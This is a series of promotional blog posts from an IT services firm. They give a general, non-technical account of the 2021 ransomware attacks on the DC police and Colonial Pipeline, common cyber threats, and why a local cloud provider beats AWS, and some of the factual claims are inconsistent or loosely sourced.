Ransomware, The DC Police & The Colonial Pipeline
Cyber attacks have been on the rise across the board between 2020 and 2021. In fact this year, there has been a 102% rise in ransomware attacks carried out by hacker. This past week we have seen, and many of us have felt, two major ransomware attacks and their fallout. What was once something that was regulated only to businesses and smaller institutions have become big business to hackers, with companies paying out millions of dollars to get there networks back in order and mitigate damages.
WHAT IS RANSOMWARE
Ransomware is software that is designed to shut down a company or institutions network, till a monetary demand is paid. Think of it like digital kidnapping. Hackers use different methods to implant malicious software and access a system. From there they will encrypt the data it contains and lock out authorized users, until the demanded ransom is paid. Oftentimes these are sold as a service from one hacker to another, and usually target businesses or data reliant institutions such as schools and hospitals.
While at times, in the case of WannaCry, an early ransomware program, these issues can be handled without paying the ransoms, there can be consequences. In one case, a hospital dealing with a ransomware attack had to reroute an ambulance with a critical patient over 20 miles away, causing the patient to die in transit. At times, these hackers will threaten to
delete the data. Other times, they will threaten to leak the data to both the clear and dark webs, putting personal and proprietary information in jeopardy.
These attacks are proving to be more costly as time passes, as the ransoms paid have increased 171% averaging over $300,000 per payment. The two most recent cases of ransomware are also two of the most concerning examples, as they targeted both infrastructure and security. These attacks have caused massive panic in some cases, and in others, have put lives in jeopardy of those sworn to serve and protect the populace.
THE DC POLICE RANSOMWARE ATTACK
Early this week it was revealed that the Washington DC Metro Police department was hit with a ransomware attack that originated in Russia. The attack occurred late last month, and the threat was simple. The hackers demanded 4 million dollars in ransom to unencrypt the files they had. They were clear, if they were not paid, they would begin to release sensitive data on officers, including background checks, full names and information of officers in the field including undercovers, psych evaluations and improprieties that
had been brushed under the rug.
The attack was carried out by a group calling themselves Babuk. While they are relative newcomers to the ransomware world, this isn’t their first rodeo. Babuk made headlines last year by launching a ransomware attack on the Houston Rockets. Ironically, the Houston Rockets, a professional basketball team, had security protocols that were able to minimize their damages. The Washington DC Police, were far less equipped. Last week the department offered their counter offer, $100,000 dollars in exchange for getting their data back. Babuk was not having any of that however. In response, they leaked troves of information into the world. They released documents pertaining to hiring, including candidate
interviews and reviews, information that the police had on street gangs and other criminal organizations, and daily intelligence briefings that were meant for the police commissioners eyes only. On top of that, dozens of officers medical records, addresses, and financial records have been released as well.
While the ransom has not yet been paid, Babuk has gone a different, far more frightening route. They have decided to release their ransomware code to the dark web, so any hacker can use it. Analysts have conflicting opinions on this. Some are stating the reasoning for this is that the code is faulty, it deletes files whether the party demanding the ransom wanted them deleted or not. Others have stated that this “retirement” is due to the the fact they hit a high-profile target and become headline news, leaving themselves open to retaliation from law enforcement.
THE COLONIAL PIPELINE ATTACK
If you are reading this, I imagine you are familiar with the Colonial Pipeline attack. The internet has been flooded with memes and images of people filling up bags with gasoline. Long lines, shortages and panic buying have been seen up and down the East Coast. The White House, and President Biden have had to publicly address this multiple times last week. What happened though? Last week, hackers encrypted over 100 GB of internal data in order to hold the operators of the Colonial Pipeline hostage. The pipeline, which carries gas to much of the southeastern US, had to shut it’s systems down in order to stop the ransomware from spreading.
The ransomware was designed by a group called Darkside and sold to a secondary operator. This operator had a two fold plan of attack, hold the information hostage, and threaten to release the data, similar to how the DC police attack occurred. The fallout from this was nearly instantaneous. It caused the biggest gas shortage of the twenty first century, causing panic amongst customers, and legitimate shortages across the southeastern US. The panic however, spread across the east coast. In fact, this writer personally witnessed
three gas stations in PA that were without gas, not because of the pipeline, but because of panic buying.
Darkside, the group who created the malicious software, specialize in what is known as Ransomware as a Service. They are not the ones who carry out the attacks. They create the software, and also run a help desk to aid in negotiations and victims getting their information back. Even they were not expecting the fallout from this. In fact they released a statement that in effect served as an apology claiming they never intended for their product to be used to shut down infrastructure and would, in the future, better vette potential customers and add parameters to what the software could be used for.
While initially the administrators of Colonial denied paying the ransom, it was later revealed that they paid over $5 million dollars in Bitcoin to the hackers in order to shut down the attack and save their data. As of this writing, operations have restarted at the Colonial Pipeline, adverting a long term shortage. Ransomware is a problem that is not going away. However, these attacks have illustrated how we need to be prepared, both as citizens and as a nation to protect ourselves from the damaging attacks, and hackers who wish us harm for their own personal gain. In the wake of these attacks, the White House has announced the Industrial Control Systems Cyber Security Initiative.
It is now understood that these vulnerabilities must be recognized and protected to ensure that this pipeline attack is not the tip of the iceberg. These attacks are widespread and could potentially ruin their victims. It doesn’t matter if you are a local municipality, government agency, small business or major corporation, security should be your top concern. If you are interested in protecting yourself from these attacks, make sure to stay on top of your patches, and be sure to reach out to a security minded MSP, like Delval Technology Solutions
How to Take a Proactive Approach to Cybersecurity
Each year, the volume of cybersecurity threats continues to steadily climb, with more than one billion malware programs out there and approximately 560,000 new pieces of malware being detected each day. All the while, regulations, such as the General Data Protection Regulation (GDPR) are constantly evolving. This means even the most minor of security breaches can be incredibly devastating for your organization, leading to negative publicity, hefty fines and a loss of confidence in your brand.
At Delval Technology Solutions, we can help you implement a proactive approach to cybersecurity that sees your business is protected on all fronts in a dynamic, complex and ever-evolving threat landscape. This means understanding your organization, including its systems, applications and user base, identifying where vulnerabilities lie and addressing security risks before an attack ever occurs. This article will delve into how to do just that with a dedicated technology partner by your side.
Identify and Evaluate Risks for Assets That Could Be Affected by Cyberattacks
A proactive approach to cybersecurity is all about understanding, managing and mitigating risk to your company’s critical assets. The easiest way to accomplish this mission and ensure any shortfalls in your IT infrastructure are properly addressed is to conduct a comprehensive risk assessment. Here are a few basic steps to ensure a smooth risk assessment within your organization:
- Identify and Prioritize Assets: Here is where you will determine the scope of the assessment and decide which valuable assets attackers may wish to target.
- Identify Threats: A cyberthreat is anything that could cause harm to your organization, such as hardware failure, natural disasters, human error and more.
- Identify Vulnerabilities: This is where you’ll identify any vulnerabilities that could be exploited to breach security and cause harm or steal data from your organization.
- Analyze Controls: These are any controls that are in place to mitigate or eliminate the possibility of a cyberthreat. They should be classified as either preventative or detective.
- Calculate the Likelihood of an Attack: At this point, you can determine the likelihood of a given attack considering the current control environment your organization has in place.
- Develop a Risk Assessment Report: Finally, you can develop a risk management report that supports management in decision-making on cybersecurity budget, policies and procedures.
Invest in Preventative Cybersecurity Measures
Just like there is not one security product that can completely encompass all your organization’s vulnerabilities, there is not a single cybersecurity policy that can sufficiently address all the needs of your business. Instead, it’s time to invest in a multi-layered, integrated cybersecurity strategy that covers many core areas of cybersecurity, including network security, cloud security, application security, Internet of Things (IoT) security and more. To lay the foundation for a solid cybersecurity strategy, it’s important to do the following:
Understand the risks your organization faces on a daily basis Establish protective monitoring to detect and mitigate these threats
Prepare secure data backups that keep your business up and running in the event of an attack
Revisit your cybersecurity strategy as your organization changes and evolves over time
Never Underestimate the Power of Cybersecurity Training
A proactive approach to cybersecurity begins with awareness. While lack of proper training can leave employees more than vulnerable to releasing cyberattacks on to your organization, diverting resources into proper cybersecurity training could very well mean the difference between the success and failure of your business. The responsibility always lies on the employer to ensure that your employees have the knowledge they need to make the right decisions and where to turn if they have any questions related to cybersecurity. To prioritize cybersecurity training for your employees, we recommend getting executive buy-in, start training early and often and making the security health of your organization an ongoing, team effort.
Stop Relying on Reactive Cybersecurity Measures Alone to Protect Your Business
If your company’s current cybersecurity strategy is limited to firewalls, antivirus or anti-malware software, ad blockers and other measures put in place to spot the tell-tale signs of a security breach, there’s a good chance that you already have a reactive cybersecurity strategy in place. Unfortunately, reactive cybersecurity measures on their own are not enough to comprise a strong cybersecurity defense. You need to have a combination of both proactive and reactive measures in order to actively prevent data breaches and mitigate cyberthreats. For more cybersecurity solutions, include cloud security services, contact the experts at Delval Technology Solutions.
A quality Managed Services Provider can save your business money and aggravation
AWS vs Local Cloud Providers: Who's Best for Your Business
It has been said that we live in an era of infinite choice. From the foods you eat, the shows you watch, to the goods you purchase, the possibilities are endless, and at times so is the confusion. Oftentimes our choice comes down to who is providing the service and where we are getting it from. Do we pick giant platforms backed up by industry titans like Hulu, Spotify and Whole Foods? Is supporting small businesses, such as buying from Etsy stores, watching independent films, and shopping at farmers markets, important to your decision making? It can be a lot to process, at times to the point of anxiety and frustration.
The cloud has gone from a novel idea to upload your personal photos to, to a must have when it comes to backing up your business data. It has been said that over 6 million hard drives crash each year, so not having a cloud backup is basically no longer an option. Choosing a cloud service provider for your business is no different than any of these choices. Do you go with the multi-billion dollar corporations such as Amazon, Microsoft and Google? Do you choose the personalized and localized approach of a company such as Delval
Technology Solutions? Well, it depends on you and what you are looking for. Today we are going to focus on the head to head between your local service provider, and the monolith of business and consumerism that is Amazon.
WHAT IS AWS
AWS stands for Amazon Web Services. Like everything that Amazon does, when they start to see they are spending to much money on an outside service, they move it in house, and then lease it out to others. After encountering problems with the United States Postal Service, they created their own shipping fleets. After realizing they were spending huge sums of money on server fees, Amazon sprung into action and purchased server farms around the globe. From there, to expand on their revenue base, they launched the subsidiary known
as AWS. Using these massive server farms they acquired, Amazon began offering cloud services for businesses of all size across the globe.
WHAT DOES AWS OFFER
AWS is known for it’s ease of use. Similar to Amazon’s other services, they pride themselves on not being to tech heavy and their ability to be understood by businesses ranging from tech novices to experts. Following the playbook utilized by their parent company, AWS strives to be a one stop shop for companies, offering a variety of software, network and analytic tools, and other products to bolster their cloud services. They also offer unlimited bandwidth, which makes scalability much easier, and security services to ensure that
working with them, your data is protected.
WHAT ARE THE ISSUES?
However, Amazon Web Services also has it’s drawbacks. One of the biggest, is their billing system. As a business owner, when you get an invoice, you want to know what you are paying for in an easily digestible manner. It can be frustrating to open up your invoice and see things that you weren’t using being charged to you, obtuse explanation of charges, or being charged for things that you didn’t know were add-ons. These are all complaints that AWS customers have made in regard to their bills.
In the past few years, data mining has gone from a relatively unknown industry term to a part of the cultural lexicon in regards to tech. Privacy concerns of the average citizen when it comes to big tech are mostly, in fact, based on the practice of data mining. As you know, your data is the lifeblood of your business, and is something that you must protect at all costs for the sake of your company and your customers. Unfortunately, one thing AWS doesn’t protect you against is data mining. In fact, they are usually the ones mining your data! Amazon is set up to mine customer data to gauge usage, buying and reviewing habits, geography and income. AWS mines your data in the same way, using their own analytics tools that they are reselling to you. Also, Amazon and AWS have found loopholes that allow them to sell your data to foreign corporations and governments, the same way that personal
consumer data is shown.
Another important thing to remember when it comes to AWS is the scope of the company. AWS has millions of subscribers around the globe. While this can be a good thing on certain issues, it also means that the chances of dealing with someone who knows you, your business, and where your data actually is are slim to none.
WHAT CAN A LOCAL CLOUD PROVIDER DO FOR YOU?
Think of your local cloud provider, such as Delval Technology Solutions, as your favorite family-owned store. While they may not have the same stock of a Wal-Mart or Amazon, they provide other things that these giant conglomerates can’t. Your favorite deli remembers that you want hot peppers, but you hate pickles. The local hardware store owner helped you
handcraft your new deck. Your favorite bartender, well you don’t even have to order, your drink is waiting for you as soon as you make eye contact. A local MSP is no different than any of these local businesses. When you build a relationship with them, they get to know you and you get to know them, personally. More importantly, they get to know your
business. You aren’t just a code on screen being forwarded to some far away call center. You can walk into their office, shake their hand, and speak with them about tech issues that are important to your business. When it comes to advising you on your next steps, your local MSP is doing so with intricate knowledge of your business and your needs, something you can’t get from a giant company.
A company like AWS has server farms all over the globe. While this has it’s benefits in terms of operational scope it has it’s drawbacks as well. One of which is for bringing new clients to the cloud. It can take a new customer more time and headaches to migrate to a gigantic cloud than to a localized cloud. It’s also an issue of comfort. After all, this is your
network, the lifeblood of your business. Not knowing where it’s located can be a cause of anxiety for many. However with a local MSP such as Delval Technology Solutions, knowing where your data is stored and who is watching it is a transparent issue.
Chances are, you aren’t a technological expert. You are however an expert in your field, trusted by your client to handle their needs be it legal, financial or otherwise. It’s fair to say that you want your cloud service provider to be an expert as well. While a company such as AWS may have thousands of employees, they do not have thousands of experts. This can pose an issue while looking for solutions to complex problems regarding your network. A local cloud provider is different. They are experts at their systems, and due
to having a hands on approach, are teeming with solutions to any issue you may face, many times before you even have them.
Finally, and to many most importantly, is cost. Your local cloud service provider understands your budget and works to keep you inside of it while providing you the most “bang for your buck”. They can make sure you are only being charged for what you need, not things you may possibly need in the future.
When it comes to a cloud provider, there are many factors to take into account. What matters to you and your business can be many things. For some it's cost, for others it's comfort. Do your research, weigh the pro's and cons. This will help your business live a long life and not die "death by infinite choice."
Threats To Look Out For in 2021
2020 and the Covid pandemic not only changed the way a lot of companies do business, but it also changed the way hackers attack those businesses. Last year, cyber attacks were up over 200 percent, and this trend shows no signs of letting up. More people are working from home, utilizing mostly unsecure home wifi networks to access their company clouds. While many of these attacks being used by attackers have been used in the past, their methods are getting more sophisticated. What follows are the biggest threats to look out for in 2021. Protect yourself from these with proper software and protocol, and a security minded MSP such as Delval Technology Solutions.
SOCIAL ENGINEERING
Social engineering attacks are those that use your employee’s and even yourself to exploit your network. The most notorious of these is Phishing. Phishing attacks use misleading texts, emails and even phone calls to convince the recipient to execute an action that can range from inputting your email and password into a mirrored site that takes your data, to downloading a file that is full of malware, to even sending money to the culprit. These are done using emails and texts that look like they are for legitimate reasons from legitimate
sources. In 2020, phishing attacks rose by an astounding 600%.
An offshoot of this is called spear phishing, which is a more targeted form appearing to come from trusted sources such as CEO’s and HR departments. Pretexting has also been
on the rise. Pretexting relies on both trust and empathy. These criminals acted as a person known to the victim, maybe their boss calling and saying he is stuck and needs some help in the form of gift cards. While phishing is a more basic form, such as “You have just won a million dollars”, pretexting is more complex, with a believable story and a repour. However, regardless of how they are doing it, a social engineer’s goal is to get into your system, and get valuable resources, such as money or data.
RANSOMWARE
Over the course of 2020 into 2021, ransomware attacks have soared. Many are familiar with the WannaCry attack that nearly shut down the UK’s National Health Services. Ransomware occurs when hackers access a system and hold data for ransom, locking authorized users out of the system until the ransom is paid. Most recently, the Washington DC
Police Department was hit with a staggering ransomware attack. Over 250 gigabytes of data, including personnel files were held for ransom by a dark web hacking group out of India. While many other attacks have been prevalent, ransomware is perhaps the most concerning. There is no guarantee that if you pay the ransom you will get your data back. This is why proper encryption of your files and proper backup protocols are critical, as to not be left vulnerable and have your system open to attacks.
DDoS
DDoS stands for Distributed Denial of Service. While the acronym may seem a bit confusing, the attacks are straight forward. A DDoS attack sends hundreds of thousands if not millions of requests, emails and data packets aimed to overwhelm a corporate server, in the hopes of shutting down it’s function. These don’t just shut down e-commerce sites or email servers, but they attack your entire network. One of the things they slowdown is referred to as SNMP, or simple network management protocols. These are the protocols
attached to your entire network and can shut users out of your system, and even throw your hardware out of wack. Last year, Amazon Web Services was hit with a massive DDoS attack that caused major headaches, even for a billion-dollar organization with high end security protocols. School districts in Massachusetts and a university in Canada were among those hit last year. However, all three chalked it up to a network failure, only to discover later that it was hackers who took down the network.
FILELESS MALWARE ATTACKS
Traditional malware requires the attacker put implant a code into a system. This doesn’t make it any less dangerous, however it does make it easier to detect. However, we have seen an uptick in a new form of malware that requires no code. It uses operating tools within the network to work against your system and steal your data. The approach is also known as “living off the land”. The social engineering, we spoke about before is a method that is used to get into the system by these malicious actors. Once in the system, the
fileless malware usually is implanted into the registry or memory, making sure it runs every time that the system is opened. There is no file to detect, only self-writing
code that is hidden deep in the memory, stealing whatever the hacker sees fit, tricking your network into working for the criminals, against your business.
These often are used for cryptomining attacks, in which a hacker can transform an entire network into a cryptomining outfit, slowing down the network, jacking up energy bills, and potentially destroying hardware due to system overloads. Last year alone saw a nearly 900% rise in these attacks.
ZERO DAY EXPLOITS
In March, Microsoft announced that the Exchange server system was hit with a massive worldwide Zero Day Exploit. A zero-day exploit is named as such as it occurs immediately when a vulnerability is discovered. Hackers work long and hard to find these weaknesses in major software, and when they do it’s off to the races. These exploits can take months for the attacked developer to realize, in Microsoft’s case it took almost 3 months from the original exploit until it was discovered and patched. Usually, the developer isn’t even
the party that realizes the exploit occurred. For the most part, a security watchdog firm or a hacked end user is the first to realize that the exploit is occurring, and in most cases after the damage is done.
These are just a few of the threats that we will be hearing a lot about in 2021. How they effect you is all about how you handle your security. The best thing you can do, partner with a security minded MSP such as Delval Technology Solutions. This gives you access to a team of experts, world class security technology, and most importantly, someone who has your back. On top of that, regular system maintenance, routine vulnerability checks, and staying up to date on your firewalls and anti-virus software will keep the headaches and the hackers at bay, allowing you the piece of mind to run your business in peace.